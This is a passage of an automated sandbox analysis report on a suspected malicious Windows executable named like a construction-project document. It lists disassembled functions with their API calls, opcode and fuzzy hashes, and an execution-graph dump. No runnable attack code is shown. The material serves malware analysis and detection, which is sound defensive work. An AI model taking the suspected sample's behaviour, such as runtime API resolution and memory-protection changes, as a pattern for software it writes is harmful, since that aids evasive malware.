                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1860491036-0
                                                                                                                          • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                                                                          • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                                                                                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                                                                          Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040A908
                                                                                                                          • free.MSVCRT ref: 0040A92B
                                                                                                                          • memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                                                                          • Opcode Fuzzy Hash: 48b5110f71ff603a034409774c278151667955e8266c70f87da55b4d75e749d9
                                                                                                                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                                                                          Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                          • free.MSVCRT ref: 0040B201
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B224
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocwcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 726966127-0
                                                                                                                          • Opcode ID: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                          • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                                                                                                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                          Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                                                                            • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                                                                            • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                                                                          • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                                                                          • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 231171946-0
                                                                                                                          • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                          • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                                                                          • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                                                                          • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                                                                          Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • strlen.MSVCRT ref: 0040B0D8
                                                                                                                          • free.MSVCRT ref: 0040B0FB
                                                                                                                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                          • free.MSVCRT ref: 0040B12C
                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$memcpy$mallocstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3669619086-0
                                                                                                                          • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                          • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                                                                                                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                          Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                                                                          • malloc.MSVCRT ref: 00417407
                                                                                                                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                                                                          • free.MSVCRT ref: 00417425
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$freemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2605342592-0
                                                                                                                          • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                          • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                                                                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                          Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcslen$wcscat$wcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1961120804-0
                                                                                                                          • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                          • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                          • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                                                                                                          • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:2.4%
                                                                                                                          Dynamic/Decrypted Code Coverage:20%
                                                                                                                          Signature Coverage:0.5%
                                                                                                                          Total number of Nodes:867
                                                                                                                          Total number of Limit Nodes:22
                                                                                                                          execution_graph 33876 40fc40 70 API calls 34049 403640 21 API calls 33877 427fa4 42 API calls 34050 412e43 _endthreadex 34051 425115 76 API calls __fprintf_l 34052 43fe40 133 API calls 33880 425115 83 API calls __fprintf_l 33881 401445 memcpy memcpy DialogBoxParamA 33882 440c40 34 API calls 33884 411853 RtlInitializeCriticalSection memset 33885 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34058 40a256 13 API calls 34060 432e5b 17 API calls 34062 43fa5a 20 API calls 33887 401060 41 API calls 34065 427260 CloseHandle memset memset 32943 410c68 FindResourceA 32944 410c81 SizeofResource 32943->32944 32947 410cae 32943->32947 32945 410c92 LoadResource 32944->32945 32944->32947 32946 410ca0 LockResource 32945->32946 32945->32947 32946->32947 34067 405e69 14 API calls 33892 433068 15 API calls __fprintf_l 34069 414a6d 18 API calls 34070 43fe6f 134 API calls 33894 424c6d 15 API calls __fprintf_l 34071 426741 19 API calls 33896 440c70 17 API calls 33897 443c71 44 API calls 33900 427c79 24 API calls 34074 416e7e memset __fprintf_l 33903 43f400 15 API calls 33904 42800b 47 API calls 33905 425115 82 API calls __fprintf_l 34077 41960c 61 API calls 33906 43f40c 122 API calls __fprintf_l 33909 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33910 43f81a 20 API calls 33912 414c20 memset memset 33913 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34081 414625 18 API calls 34082 404225 modf 34083 403a26 strlen WriteFile 34085 40422a 12 API calls 34089 427632 memset memset memcpy 34090 40ca30 59 API calls 34091 404235 26 API calls 33915 425115 76 API calls __fprintf_l 34092 425115 77 API calls __fprintf_l 34094 44223a 38 API calls 33921 43183c 112 API calls 34095 44b2c5 _onexit __dllonexit 34100 42a6d2 memcpy __allrem 33923 405cda 65 API calls 34108 43fedc 138 API calls 34109 4116e1 16 API calls __fprintf_l 33926 4244e6 19 API calls 33928 42e8e8 127 API calls __fprintf_l 33929 4118ee RtlLeaveCriticalSection 34114 43f6ec 22 API calls 33931 425115 119 API calls __fprintf_l 32933 410cf3 EnumResourceNamesA 34117 4492f0 memcpy memcpy 34119 43fafa 18 API calls 34121 4342f9 15 API calls __fprintf_l 33932 4144fd 19 API calls 34123 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34124 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34127 443a84 _mbscpy 34129 43f681 17 API calls 33935 404487 22 API calls 34131 415e8c 16 API calls __fprintf_l 33939 411893 RtlDeleteCriticalSection __fprintf_l 33940 41a492 42 API calls 34135 403e96 34 API calls 34136 410e98 memset SHGetPathFromIDList SendMessageA 33942 426741 109 API calls __fprintf_l 33943 4344a2 18 API calls 33944 4094a2 10 API calls 34139 4116a6 15 API calls __fprintf_l 34140 43f6a4 17 API calls 34141 440aa3 20 API calls 34143 427430 45 API calls 33947 4090b0 7 API calls 33948 4148b0 15 API calls 33950 4118b4 RtlEnterCriticalSection 33951 4014b7 CreateWindowExA 33952 40c8b8 19 API calls 33954 4118bf RtlTryEnterCriticalSection 34148 42434a 18 API calls __fprintf_l 34150 405f53 12 API calls 33962 43f956 59 API calls 33964 40955a 17 API calls 33965 428561 36 API calls 33966 409164 7 API calls 34154 404366 19 API calls 34158 40176c ExitProcess 34161 410777 42 API calls 33971 40dd7b 51 API calls 33972 425d7c 16 API calls __fprintf_l 34163 43f6f0 25 API calls 34164 42db01 22 API calls 33973 412905 15 API calls __fprintf_l 34165 403b04 54 API calls 34166 405f04 SetDlgItemTextA GetDlgItemTextA 34167 44b301 ??3@YAXPAX 34170 4120ea 14 API calls 3 library calls 34171 40bb0a 8 API calls 34173 413f11 strcmp 33977 434110 17 API calls __fprintf_l 33979 425115 108 API calls __fprintf_l 34174 444b11 _onexit 33981 425115 76 API calls __fprintf_l 33984 429d19 10 API calls 34177 444b1f __dllonexit 34178 409f20 _strcmpi 33986 42b927 31 API calls 34181 433f26 19 API calls __fprintf_l 34182 44b323 FreeLibrary 34183 427f25 46 API calls 34184 43ff2b 17 API calls 34185 43fb30 19 API calls 33993 414d36 16 API calls 33995 40ad38 7 API calls 34187 433b38 16 API calls __fprintf_l 33867 44b33b 33868 44b344 ??3@YAXPAX 33867->33868 33869 44b34b 33867->33869 33868->33869 33870 44b354 ??3@YAXPAX 33869->33870 33871 44b35b 33869->33871 33870->33871 33872 44b364 ??3@YAXPAX 33871->33872 33873 44b36b 33871->33873 33872->33873 33874 44b374 ??3@YAXPAX 33873->33874 33875 44b37b 33873->33875 33874->33875 33999 426741 21 API calls 34000 40c5c3 125 API calls 34002 43fdc5 17 API calls 34188 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34005 4161cb memcpy memcpy memcpy memcpy 32948 44b3cf 32949 44b3e6 32948->32949 32959 44b454 32948->32959 32949->32959 32961 44b40e GetModuleHandleA 32949->32961 32950 44b45d GetModuleHandleA 32954 44b467 32950->32954 32951 44b49a 32974 44b49f 32951->32974 32954->32954 32956 44b487 GetProcAddress 32954->32956 32954->32959 32955 44b405 32955->32954 32957 44b428 GetProcAddress 32955->32957 32955->32959 32956->32959 32958 44b435 VirtualProtect 32957->32958 32957->32959 32958->32959 32960 44b444 VirtualProtect 32958->32960 32959->32950 32959->32951 32959->32954 32960->32959 32962 44b417 32961->32962 32970 44b454 32961->32970 32993 44b42b GetProcAddress 32962->32993 32964 44b41c 32968 44b428 GetProcAddress 32964->32968 32964->32970 32965 44b45d GetModuleHandleA 32972 44b467 32965->32972 32966 44b49a 32967 44b49f 775 API calls 32966->32967 32967->32966 32969 44b435 VirtualProtect 32968->32969 32968->32970 32969->32970 32971 44b444 VirtualProtect 32969->32971 32970->32965 32970->32966 32970->32972 32971->32970 32972->32970 32973 44b487 GetProcAddress 32972->32973 32973->32970 32975 444c4a 32974->32975 32976 444c56 GetModuleHandleA 32975->32976 32977 444c68 __set_app_type __p__fmode __p__commode 32976->32977 32979 444cfa 32977->32979 32980 444d02 __setusermatherr 32979->32980 32981 444d0e 32979->32981 32980->32981 33002 444e22 _controlfp 32981->33002 32983 444d13 _initterm __getmainargs _initterm 32984 444d6a GetStartupInfoA 32983->32984 32986 444d9e GetModuleHandleA 32984->32986 33003 40cf44 32986->33003 32990 444dcf _cexit 32992 444e04 32990->32992 32991 444dc8 exit 32991->32990 32992->32951 32994 44b454 32993->32994 32995 44b435 VirtualProtect 32993->32995 32997 44b45d GetModuleHandleA 32994->32997 32998 44b49a 32994->32998 32995->32994 32996 44b444 VirtualProtect 32995->32996 32996->32994 33001 44b467 32997->33001 32999 44b49f 775 API calls 32998->32999 32999->32998 33000 44b487 GetProcAddress 33000->33001 33001->32994 33001->33000 33002->32983 33054 404a99 LoadLibraryA 33003->33054 33005 40cf60 33040 40cf64 33005->33040 33062 410d0e 33005->33062 33007 40cf6f 33066 40ccd7 ??2@YAPAXI 33007->33066 33009 40cf9b 33080 407cbc 33009->33080 33014 40cfc4 33098 409825 memset 33014->33098 33015 40cfd8 33103 4096f4 memset 33015->33103 33020 40d181 ??3@YAXPAX 33022 40d1b3 33020->33022 33023 40d19f DeleteObject 33020->33023 33021 407e30 _strcmpi 33024 40cfee 33021->33024 33127 407948 free free 33022->33127 33023->33022 33026 40cff2 RegDeleteKeyA 33024->33026 33027 40d007 EnumResourceTypesA 33024->33027 33026->33020 33029 40d047 33027->33029 33030 40d02f MessageBoxA 33027->33030 33028 40d1c4 33128 4080d4 free 33028->33128 33032 40d0a0 CoInitialize 33029->33032 33108 40ce70 33029->33108 33030->33020 33125 40cc26 strncat memset RegisterClassA CreateWindowExA 33032->33125 33034 40d1cd 33129 407948 free free 33034->33129 33036 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33126 40c256 PostMessageA 33036->33126 33040->32990 33040->32991 33041 40d061 ??3@YAXPAX 33041->33022 33044 40d084 DeleteObject 33041->33044 33042 40d09e 33042->33032 33044->33022 33046 40d0f9 GetMessageA 33047 40d17b CoUninitialize 33046->33047 33048 40d10d 33046->33048 33047->33020 33049 40d113 TranslateAccelerator 33048->33049 33051 40d145 IsDialogMessage 33048->33051 33052 40d139 IsDialogMessage 33048->33052 33049->33048 33050 40d16d GetMessageA 33049->33050 33050->33047 33050->33049 33051->33050 33053 40d157 TranslateMessage DispatchMessageA 33051->33053 33052->33050 33052->33051 33053->33050 33055 404ac4 GetProcAddress 33054->33055 33058 404aec 33054->33058 33056 404add FreeLibrary 33055->33056 33059 404ad4 33055->33059 33057 404ae8 33056->33057 33056->33058 33057->33058 33060 404b13 33058->33060 33061 404afc MessageBoxA 33058->33061 33059->33056 33060->33005 33061->33005 33063 410d17 LoadLibraryA 33062->33063 33064 410d3c 33062->33064 33063->33064 33065 410d2b GetProcAddress 33063->33065 33064->33007 33065->33064 33067 40cd08 ??2@YAPAXI 33066->33067 33069 40cd26 33067->33069 33070 40cd2d 33067->33070 33137 404025 6 API calls 33069->33137 33072 40cd66 33070->33072 33073 40cd59 DeleteObject 33070->33073 33130 407088 33072->33130 33073->33072 33075 40cd6b 33133 4019b5 33075->33133 33078 4019b5 strncat 33079 40cdbf _mbscpy 33078->33079 33079->33009 33139 407948 free free 33080->33139 33082 407e04 33140 407a55 33082->33140 33085 407ddc 33085->33082 33152 407a1f 33085->33152 33086 407a1f malloc memcpy free free 33092 407cf7 33086->33092 33088 407d7a free 33088->33092 33092->33082 33092->33085 33092->33086 33092->33088 33143 40796e 7 API calls 33092->33143 33144 406f30 33092->33144 33094 407e30 33095 407e57 33094->33095 33096 407e38 33094->33096 33095->33014 33095->33015 33096->33095 33097 407e41 _strcmpi 33096->33097 33097->33095 33097->33096 33158 4097ff 33098->33158 33100 409854 33163 409731 33100->33163 33104 4097ff 3 API calls 33103->33104 33105 409723 33104->33105 33183 40966c 33105->33183 33197 4023b2 33108->33197 33114 40ced3 33286 40cdda 7 API calls 33114->33286 33115 40cece 33118 40cf3f 33115->33118 33238 40c3d0 memset GetModuleFileNameA strrchr 33115->33238 33118->33041 33118->33042 33121 40ceed 33265 40affa 33121->33265 33125->33036 33126->33046 33127->33028 33128->33034 33129->33040 33138 406fc7 memset _mbscpy 33130->33138 33132 40709f CreateFontIndirectA 33132->33075 33134 4019e1 33133->33134 33135 4019c2 strncat 33134->33135 33136 4019e5 memset LoadIconA 33134->33136 33135->33134 33136->33078 33137->33070 33138->33132 33139->33092 33141 407a65 33140->33141 33142 407a5b free 33140->33142 33141->33094 33142->33141 33143->33092 33145 406f37 malloc 33144->33145 33146 406f7d 33144->33146 33148 406f73 33145->33148 33149 406f58 33145->33149 33146->33092 33148->33092 33150 406f6c free 33149->33150 33151 406f5c memcpy 33149->33151 33150->33148 33151->33150 33153 407a38 33152->33153 33154 407a2d free 33152->33154 33156 406f30 3 API calls 33153->33156 33155 407a43 33154->33155 33157 40796e 7 API calls 33155->33157 33156->33155 33157->33082 33174 406f96 GetModuleFileNameA 33158->33174 33160 409805 strrchr 33161 409814 33160->33161 33162 409817 _mbscat 33160->33162 33161->33162 33162->33100 33175 44b090 33163->33175 33168 40930c 3 API calls 33169 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33168->33169 33170 4097c5 LoadStringA 33169->33170 33173 4097db 33170->33173 33172 4097f3 33172->33020 33173->33170 33173->33172 33182 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33173->33182 33174->33160 33176 40973e _mbscpy _mbscpy 33175->33176 33177 40930c 33176->33177 33178 44b090 33177->33178 33179 409319 memset GetPrivateProfileStringA 33178->33179 33180 409364 WritePrivateProfileStringA 33179->33180 33181 409374 33179->33181 33180->33181 33181->33168 33182->33173 33193 406f81 GetFileAttributesA 33183->33193 33185 409675 33186 4096ee 33185->33186 33187 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33185->33187 33186->33021 33194 409278 GetPrivateProfileStringA 33187->33194 33189 4096c9 33195 409278 GetPrivateProfileStringA 33189->33195 33191 4096da 33196 409278 GetPrivateProfileStringA 33191->33196 33193->33185 33194->33189 33195->33191 33196->33186 33288 409c1c 33197->33288 33200 401e69 memset 33327 410dbb 33200->33327 33203 401ec2 33357 4070e3 strlen _mbscat _mbscpy _mbscat 33203->33357 33204 401ed4 33342 406f81 GetFileAttributesA 33204->33342 33207 401ee6 strlen strlen 33209 401f15 33207->33209 33211 401f28 33207->33211 33358 4070e3 strlen _mbscat _mbscpy _mbscat 33209->33358 33343 406f81 GetFileAttributesA 33211->33343 33213 401f35 33344 401c31 33213->33344 33216 401f75 33356 410a9c RegOpenKeyExA 33216->33356 33218 401c31 7 API calls 33218->33216 33219 401f91 33220 402187 33219->33220 33221 401f9c memset 33219->33221 33223 402195 ExpandEnvironmentStringsA 33220->33223 33224 4021a8 _strcmpi 33220->33224 33359 410b62 RegEnumKeyExA 33221->33359 33368 406f81 GetFileAttributesA 33223->33368 33224->33114 33224->33115 33226 40217e RegCloseKey 33226->33220 33227 401fd9 atoi 33228 401fef memset memset sprintf 33227->33228 33235 401fc9 33227->33235 33360 410b1e 33228->33360 33231 402165 33231->33226 33232 402076 memset memset strlen strlen 33232->33235 33233 4070e3 strlen _mbscat _mbscpy _mbscat 33233->33235 33234 4020dd strlen strlen 33234->33235 33235->33226 33235->33227 33235->33231 33235->33232 33235->33233 33235->33234 33236 406f81 GetFileAttributesA 33235->33236 33237 402167 _mbscpy 33235->33237 33367 410b62 RegEnumKeyExA 33235->33367 33236->33235 33237->33226 33239 40c422 33238->33239 33240 40c425 _mbscat _mbscpy _mbscpy 33238->33240 33239->33240 33241 40c49d 33240->33241 33242 40c512 33241->33242 33243 40c502 GetWindowPlacement 33241->33243 33244 40c538 33242->33244 33389 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33242->33389 33243->33242 33382 409b31 33244->33382 33248 40ba28 33249 40ba87 33248->33249 33253 40ba3c 33248->33253 33392 406c62 LoadCursorA SetCursor 33249->33392 33251 40ba8c 33393 410a9c RegOpenKeyExA 33251->33393 33394 404785 33251->33394 33397 403c16 33251->33397 33473 4107f1 33251->33473 33476 404734 33251->33476 33252 40ba43 _mbsicmp 33252->33253 33253->33249 33253->33252 33484 40b5e5 10 API calls 33253->33484 33254 40baa0 33255 407e30 _strcmpi 33254->33255 33258 40bab0 33255->33258 33256 40bafa SetCursor 33256->33121 33258->33256 33259 40baf1 qsort 33258->33259 33259->33256 33842 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33265->33842 33267 40b00e 33268 40b016 33267->33268 33269 40b01f GetStdHandle 33267->33269 33843 406d1a CreateFileA 33268->33843 33271 40b01c 33269->33271 33272 40b035 33271->33272 33273 40b12d 33271->33273 33844 406c62 LoadCursorA SetCursor 33272->33844 33848 406d77 9 API calls 33273->33848 33276 40b136 33287 40c580 28 API calls 33276->33287 33277 40b042 33278 40b087 33277->33278 33284 40b0a1 33277->33284 33845 40a57c strlen WriteFile 33277->33845 33278->33284 33846 40a699 12 API calls 33278->33846 33281 40b0d6 33282 40b116 CloseHandle 33281->33282 33283 40b11f SetCursor 33281->33283 33282->33283 33283->33276 33284->33281 33847 406d77 9 API calls 33284->33847 33286->33115 33287->33118 33300 409a32 33288->33300 33291 409c80 memcpy memcpy 33292 409cda 33291->33292 33292->33291 33293 409d18 ??2@YAPAXI ??2@YAPAXI 33292->33293 33294 408db6 12 API calls 33292->33294 33295 409d54 ??2@YAPAXI 33293->33295 33297 409d8b 33293->33297 33294->33292 33295->33297 33297->33297 33310 409b9c 33297->33310 33299 4023c1 33299->33200 33301 409a44 33300->33301 33302 409a3d ??3@YAXPAX 33300->33302 33303 409a52 33301->33303 33304 409a4b ??3@YAXPAX 33301->33304 33302->33301 33305 409a63 33303->33305 33306 409a5c ??3@YAXPAX 33303->33306 33304->33303 